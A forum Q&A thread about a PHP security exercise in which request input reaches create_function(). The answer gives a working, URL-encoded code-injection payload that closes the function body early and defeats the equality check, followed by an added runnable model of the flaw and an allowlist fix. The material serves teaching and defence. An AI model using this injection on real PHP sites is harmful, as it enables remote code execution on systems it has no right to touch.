
PHP code injection not working


I came across a site where you can do some exercises regarding cyber security.

From what I understand you have to do PHP injection. I looked online for examples but still I could not implement them.

Any help or tips would be appreciated; also, if this is not the right place to ask this kind of question please let me know.

The code:

<body> 
    <div class="corb-centered corb-php text-center"> 
      <h3> 
        <a target="_blank" href="/index.php?source">source</a> 
      </h3> 
      <h3> 
        Start here : <a href="/index.php?code=echo 'hello foobar';">Hello foobar</a> 
      </h3> 

      <div class="text-left"> 
        <h3>Output : </h3> 
        <pre><code><?php 
        if (isset($_GET['code'])) { 
          $new_func = create_function('', $_GET['code']); 
          if ($_GET['code'] === "echo 'hello foobar';") { 
            $new_func(); 
          } 
        } 
        ?></code></pre> 
      </div> 
    </div>     
</body> 

I've tried everything I know:

ls']); $new_func();//
ls']); $new_func(); print('
ls; $new_func();//
ls''); $new_func();//
...

Solution

  • According to the PHP docs:

    Caution This function internally performs an eval() and as such has the same security issues as eval().

    This is exactly what can be exploited in this case. PHP basically just glues function __lambda_func(<args>) {<code>} together and then evaluates it.

    Using the following code parameter should output the string do something else...

    /index.php?code=%7D%20%24_GET%5B%27code%27%5D%20%3D%20"echo%20%27hello%20foobar%27%3B"%3B%20echo%20%27do%20something%20else..%27%3B%20%2F%2F
    

    Decoded version:

    } $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //
    

    Explained version:

    }                                       # end the function body prematurely so the following code is executed immediately
    $_GET['code'] = "echo 'hello foobar';"; # trick the IF check by overwriting what's actually in $_GET['code']
    echo 'do something else..';             # any code that should be executed goes here
    //                                      # comment out the function-body closing brace that is added by PHP after the code
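The mechanism the answer describes, modelled in runnable PHP. This is an added example, not code from the question, the answer or the challenge site. model_create_function() is an assumed stand-in for the real create_function() (deprecated in PHP 7.2 and removed in PHP 8.0, so the challenge snippet itself no longer runs on current PHP), and safe_handler() is an assumed hardened variant, not anything the challenge implements.

```php
<?php
// Added example, not part of the original question or answer.
// ASSUMPTION: model_create_function() stands in for the removed
// create_function(); it reproduces the glue-and-eval behaviour the answer
// describes and nothing more.

function model_create_function(string $args, string $code): string {
    // Unique name so the script can be run more than once in one process.
    $name = '__lambda_func_' . bin2hex(random_bytes(4));
    // The dangerous step: request text is concatenated into PHP source and
    // evaluated immediately. Any top-level statement inside $code runs here,
    // before the caller gets a chance to inspect the string.
    eval("function $name($args){" . $code . "}");
    return $name;
}

// Mirrors the challenge handler: compile first, compare afterwards.
function vulnerable_handler(): void {
    if (isset($_GET['code'])) {
        $new_func = model_create_function('', $_GET['code']);
        // By the time this runs, injected code may already have rewritten
        // $_GET['code'], so the comparison guards nothing.
        if ($_GET['code'] === "echo 'hello foobar';") {
            $new_func();
        }
    }
}

// ASSUMED hardened form: the request value is only used as a lookup key and
// the code it selects is a fixed closure, so no attacker text reaches eval().
function safe_handler(): void {
    $allowed = [
        "echo 'hello foobar';" => function (): void { echo "hello foobar"; },
    ];
    if (isset($_GET['code']) && array_key_exists($_GET['code'], $allowed)) {
        $allowed[$_GET['code']]();
    }
}

// The payload from the answer, verbatim (nowdoc, so nothing is interpolated).
$payload = <<<'PHP'
} $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //
PHP;

// What the engine evaluates: the injected '}' closes an empty lambda body,
// the assignment and echo sit at top level, and '//' swallows the closing
// brace that create_function appends.
echo "glued source: function __lambda_func(){", $payload, "}\n";

// A correctly encoded link for the same payload (the answer's link was
// encoded by hand; rawurlencode() does it mechanically).
echo "url: /index.php?code=", rawurlencode($payload), "\n";

echo "vulnerable handler: ";
$_GET['code'] = $payload;   // constructed request, as if sent via the query string
vulnerable_handler();       // injected echo runs; the rewritten $_GET['code']
echo "\n";                  // then satisfies the === check and the empty lambda is called

echo "safe handler, payload: ";
$_GET['code'] = $payload;
safe_handler();             // payload is not an allowed key, so nothing is executed
echo "\n";

echo "safe handler, intended input: ";
$_GET['code'] = "echo 'hello foobar';";
safe_handler();             // the fixed closure runs; no eval() involved
echo "\n";
```

Run it with `php example.php` (any PHP 7 or 8 CLI). The point is the order of operations: the request text is turned into source and evaluated before the `===` comparison is reached, so the comparison can be satisfied by the injected code itself. Moving the comparison in front of create_function() would close this particular hole, but the hardened handler goes further and never hands request text to eval() at all, which is the only robust fix for this class of bug.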